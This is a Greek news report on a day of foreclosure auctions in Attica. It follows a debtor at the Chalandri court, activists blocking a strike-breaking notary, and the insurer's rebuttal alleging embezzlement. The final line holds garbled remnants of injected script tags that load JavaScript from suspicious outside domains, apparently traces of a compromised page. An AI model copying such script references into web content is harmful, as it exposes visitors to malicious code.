Πλειστηριασμοί: Συγκίνηση, αλληλεγγύη και περίεργες ιστορίες

5a0d674fccbce61d4bf3d8d99189b85f_L
Η οφειλέτρια που κινδυνεύει να χάσει το σπίτι της, το μπλόκο στο Ειρηνοδικείο Χαλανδρίου και η εκδοχή της Ασφαλιστικής εταιρείας που προχωράει σε πλειστηριασμό ως έσχατη λύση. Υποστηρίζει ότι το χρέος προέρχεται από κατάχρηση…

Τετάρτη 13 Ιανουαρίου: Το δελτίο δικαστικών δημοπρασιών έχει ενημερωθεί. Την ημέρα αυτή στην περιοχή της Αττικής θα διενεργηθούν στα Ειρηνοδικεία 74 πλειστηριασμοί. Οι προσφεύγοντες είναι εταιρείες, ορισμένοι ιδιώτες, ασφαλιστικές εταιρείες και τράπεζες, τράπεζες,τράπεζες. Οι οφειλέτες -πέραν μερικών εταιρειών-στην συντριπτική πλειονότητά τους ιδιώτες,ιδιώτες, ιδιώτες. Στα προς εκποίηση ακίνητα περιλαμβάνονται αγροτεμάχια,κάποια οικόπεδα, χώροι στάθμευσης και κυρίως διαμερίσματα. Τα ποσά της οφειλής ξεκινούν από 2.500 ευρώ και φτάνουν στην περίπτωση μιας εταιρείας έως και στο ένα εκατομμύριο ευρώ. Κάποιοι διαβάζουν το δελτίο και το μάτι τους σκαλώνει στην εκποίηση ενός πλοίου που ιδιώτης διεκδικεί από εταιρεία ΕΠΕ. Ο πιο προσεκτικός όμως αναγνώστης διατρέχοντας τον πίνακα θα διαπιστώσει ότι τα προς εκποίηση ακίνητα αφορούν διαμερίσματα,διαμερίσματα,διαμερίσματα. Πολλά εξ αυτών διαμερίσματα πρώτης κατοικίας.

Το κάλεσμα πάντως από τις συλλογικότητες και από την πρωτοβουλία Πλειστηριασμοί stop έχει ήδη πραγματοποιηθεί. Όπως τόνιζαν στις ανακοινώσεις της προηγούμενης ημέρας, «παρά την απεργία που έχει προκηρύξει η Συντονιστική Επιτροπή Συμβολαιογραφικών Συλλόγων Ελλάδας ενημερώνοντας παράλληλα για τη μη διεξαγωγή των πλειστηριασμών αυτής της Τετάρτης, μια μικρή κάστα συμβολαιογράφων πιθανολογείται ότι θα σπάσει την απεργία. Επομένως οφείλουμε να αψηφήσουμε το γεγονός της απεργίας και να δώσουμε μαχητικό και μαζικό παρών στα ειρηνοδικεία».

 Ώρα 15.30: Στο πινάκιο του ειρηνοδικείου Χαλανδρίου έχει αναρτηθεί υπόθεση εκποίησης διαμερίσματος ιδιώτη για χρέος ύψους 14.000 ευρώ προς την ασφαλιστική εταιρεία MINETTA (η οποία, έδωσε τη δική της εκδοχή για την υπόθεση, την οποία μπορείτε να δείτε στο τέλος του κειμένου).

Τι υποστηρίζει η οφειλέτρια

Έξω από το ειρηνοδικείο έχουν συγκεντρωθεί 50-70 άτομα. Μέσα στο πλήθος κι όμως απόμερα στέκεται  μια αξιοπρεπής  μεσήλικη κυρία. « Εδώ είναι το ειρηνοδικείο Χαλανδρίου;» ρωτάω αφελώς. Νεύει με το κεφάλι της και την κοιτάω και τότε βλέπω. Βλέπω το κάτασπρο πρόσωπό της. Προσέχω τα χέρια της που τρέμουν. Προσέχω ότι ακουμπάει στον τοίχο για να στηριχθεί. Προσέχω την απίστευτη αντίθεση της παρουσίας της έναντι των συγκεντρωμένων. Τον τρόμο στα μάτια της σε κοντράστ με την ορμή και την ζωηράδα των λοιπών παρευρισκομένων, το τσακισμένο πρόσωπό της. Και αίφνης αντιλαμβάνομαι. «Είστε η οφειλέτης;» Τα μάτια της Ρόζας Κ. διαστέλλονται από τον τρόμο. Το ευγενικό παρουσιαστικό της αδυνατεί να συγκαλύψει τον φόβο που διαχέεται από όλους τους πόρους του σώματός της. Τρέμει σαν το ψάρι. Τις επόμενες δυο ώρες αποσπασματικά, με διακοπές, άλλοτε με ειρμό και συνηθέστατα χωρίς ειρμό θα διηγηθεί την ιστορία της.

«Είμαι με ηρεμιστικό χάπι. Ούτε ξέρω πως κατάφερα να φτάσω έως το Ειρηνοδικείο. Δεν μπορώ να σου μιλήσω αλλά ναι θα σου πω κάποια πράγματα. Είμαι μια μικροεπαγγελματίας. Έχω έναν άνδρα ανάπηρο με ποσοστό αναπηρίας 80% και δυο μικρά παιδιά». Ακολουθεί παύση. Βουρκώνει «αν πάθω κάτι εγώ τι θα απογίνουν οι δικοί μου;» Ακουμπάει στον τοίχο και αυθόρμητα στηρίζεται προς το χέρι που της τείνω.«Μέσα σε τρία χρόνια κατάντησα καραβοτσακισμένο καράβι» συμπληρώνει ψιθυριστά. «Το σπίτι μου, που είναι πρώτη κατοικία είναι αξίας 220.000 ευρώ και η ασφαλιστική θέλει να  το εκποιήσει για χρέος 14.000 ευρώ». Πώς είπατε; Σπίτι αξίας 220.000 ευρώ θα εκποιηθεί για χρέος 14.000 ευρώ; «Ναι και πες σε παρακαλώ ότι έπεσα στα γόνατα και τους παρακάλεσα για διακανονισμό. Σας διαβεβαιώ θα σας ξεχρεώσω τους είπα και όμως αυτοί ανένδοτοι. Υπήρξα αφελής» προσθέτει «δέχτηκα να μπει υποθήκη το σπίτι μου για ένα ανόητο χρέος. Όμως ποτέ δεν περίμενα αυτήν την εξέλιξη». Και δες οποία έκπληξη στο δελτίο δικαστικών δημοπρασιών της συγκεκριμένης ημέρας η εν λόγω ασφαλιστική διεκδικεί και το διαμέρισμα ιδιώτη στον Πειραιά. Όπως επίσης έχει διεκδικήσει μέχρι στιγμής και σε άλλες τρεις περιπτώσεις διαμερίσματα.

Η Ρόζα ούτως ή άλλως δεν είχε καμία δυνατότητα προστασίας από τον νόμο Κατσέλη: Αφενός γιατί ο νόμος Κατσέλη δεν καλύπτει χρέη από εμπορικές συναλλαγές ή αδικοπραξία καθώς και χρέη προς το δημόσιο και αφετέρου καθώς η αξία του ακινήτου της υπερβαίνει τα 200.000 ευρώ. «Ξαναπέρασα το ίδιο μαρτύριο το περασμένο καλοκαίρι» προσθέτει η Ρόζα. «Τότε η διαδικασία ακυρώθηκε λόγω των capital control. Τώρα ξανά. Πόσο θα αντέξω;»

Εν τω μεταξύ ο κόσμος παραμένει συγκεντρωμένος. Ο διευθυντής του αστυνομικού τμήματος Χαλανδρίου προσεγγίζει τον χώρο δηλώνοντας ότι οι πλειστηριασμοί δεν πρόκειται τουλάχιστον σήμερα Τετάρτη να πραγματοποιηθούν. Άπαντες δηλώνουν ότι θα παραμείνουν έως τις 5 το απόγευμα οπότε και τυπικά το διαδικαστικό των πλειστηριασμών ολοκληρώνεται. Και σωστά έπραξαν όπως σύντομα αποδείχτηκε.

Ξαφνικά ακούγονται φωνές και συνθήματα μέσα από το ειρηνοδικείο. Το πρόσωπο της Ρόζας ασπρίζει (αν αυτό είναι δυνατόν) πιο πολύ. Κι όμως και παρά τις περί του αντιθέτου διαβεβαιώσεις έχει κάνει την εμφάνισή του απεργοσπάστης συμβολαιογράφος με την προσφορά του υπό μάλης. Οι αλληλέγγυοι τον περικυκλώνουν και του ζητούν να απομακρυνθεί. Ουδεμία βιαιοπραγία εκ μέρους τους. Όμως ο ίδιος παραμένει απαθής δηλώνοντας σε ψυχρό τόνο ότι «απλώς κάνει τη δουλειά του».Και όχι μόνο. Απειλεί ότι θα καλέσει την αστυνομία. «Μαυραγορίτη εξαφανίσου» φωνάζουν οι συγκεντρωμένοι. Ύστερα από αρκετή ώρα και σε καταιγισμό αποδοκιμασιών αποχωρεί καιροφυλακτώντας ωστόσο στο λίγο πιο πέρα παρκαρισμένο αυτοκίνητό του. Όπως επιβεβαιώθηκε από τις συλλογικότητες πρόκειται όντως για συμβολαιογράφο, τα στοιχεία του οποία θα κοινοποιηθούν στους Συμβολαιογραφικούς Συλλόγους της χώρας.

Ο κόσμος παραμένει συγκεντρωμένος έως ότου το ρολόι δείξει πέντε. Πέντε η ώρα που βραδιάζει. Η Ρόζα επιτρέπει πλέον στον εαυτό της ένα χείμαρρο δακρύων. Τώρα πια μπορεί να κλάψει ελεύθερα. «Πήρα τρεις με τέσσερις μήνες αναβολή στην καταδίκη μου» σημειώνει. «Θα είμαι παρούσα σε όλους τους άδικους πλειστηριασμούς, στο ξεσπίτωμα των οικογενειών»συμπληρώνει. «Πες σε αυτά  τα παιδιά που συγκεντρώθηκαν εδώ σήμερα και ούτε καν με γνωρίζουν ότι είμαι ευγνώμων. Ότι χωρίς αυτούς θα ήμουν νεκρή. Και ζήτα συγνώμη που δεν έδειξα το πρόσωπό μου. Θα το δείξω όμως στο ξεσπίτωμα άλλων ανθρώπων».

Η απάντηση της εταιρίας

Μετά τη δημοσίευση του άρθρου, η ασφαλιστική εταιρία ΜΙΝΕΤΤΑ γνωστοποίησε στο News247 τα ακόλουθα:

«Αναφορικά με το πρόσφατο δημοσίευμά σας σχετικά με την υπόθεση της κας Ρ.Κ., το οποίο παραποιεί βάναυσα την αλήθεια,  θα θέλαμε να διευκρινίσουμε τα εξής:

Η κα Ρ.Κ. συνεργαζόταν με την εταιρεία μας ως ασφαλιστική πράκτωρ μέχρι και το 2012. H συνεργασία αυτή καταγγέλθηκε εκ μέρους μας και η Εταιρία μας υπέβαλε εναντίον της μήνυση για κακουργηματική υπεξαίρεση ασφαλίστρων συνολικού ποσού  213.000 ευρώ άνευ τόκων ή προσαυξήσεων και αφού έχει αφαιρεθεί η νόμιμη προμήθειά της. Το ποσό αυτό το εισέπραξε από μεγάλο αριθμό πελατών μας και δεν το απέδωσε, προσβάλλοντας έτσι τη φήμη το κύρος και την αξιοπιστία της Εταιρία μας. Το χρέος αυτό έχει αποδεχθεί πλήρως με δυο ιδιωτικά συμφωνητικά (22/5/2012 και 25/2/2013) στα οποία υπέγραψε ως εγγυητής και ο σύζυγος της. Με βάση το πρώτο ιδιωτικό συμφωνητικό, έγινε εγγραφή συναινετικής προσημείωσης επί ακινήτου του συζύγου της. Μεταγενέστερη ανακοπή που άσκησε η κα Ρ.Κ. ενώπιον του Ειρηνοδικείου Αθηνών απορρίφθηκε το 2015. Να σημειωθεί ότι στο εν λόγω ακίνητο έχει εγγραφεί βάρος  και από το ελληνικό δημόσιο για οφειλές προς την εφορία ύψους 170.000 ευρώ.

Η εταιρεία μας κατέφυγε στην έσχατη λύση του πλειστηριασμού του ακινήτου αφού εξαντλήθηκαν όλα τα ένδικα μέσα και αφού επί τρία χρόνια η κυρία Ρ.Κ. δεν κατέβαλε καμία προσπάθεια να επιστρέψει μέρος έστω των ασφαλίστρων που υπεξαίρεσε. Να σημειωθεί ότι ο πλειστηριασμός ο οποίος αφορούσε μέρος μόνο του συνολικού χρέους, αναβλήθηκε λόγω της εξαγγελθείσας αποχής των συμβολαιογράφων από τα καθήκοντα τους και όχι λόγω της επικαλούμενης αντίδρασης των παρευρισκομένων όπως εμφανίζεται στα δημοσιεύματα.

Συνεπώς, όσοι από κακή πληροφόρηση σπεύδουν να υπερασπισθούν την εν λόγω κυρία, θα πρέπει να γνωρίζουν ότι δεν πρόκειται για «μικροεπαγγελματία που χτυπήθηκε από την κρίση και διώκεται για μικροοφειλή». Την εποχή που συντελέσθηκε η υπεξαίρεση η κα Π.Κ. εισέπραττε πάνω από 100.000 ευρώ ετησίως σε προμήθειες.

Όλα τα σχετικά στοιχεία βρίσκονται στη διάθεσή σας».

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >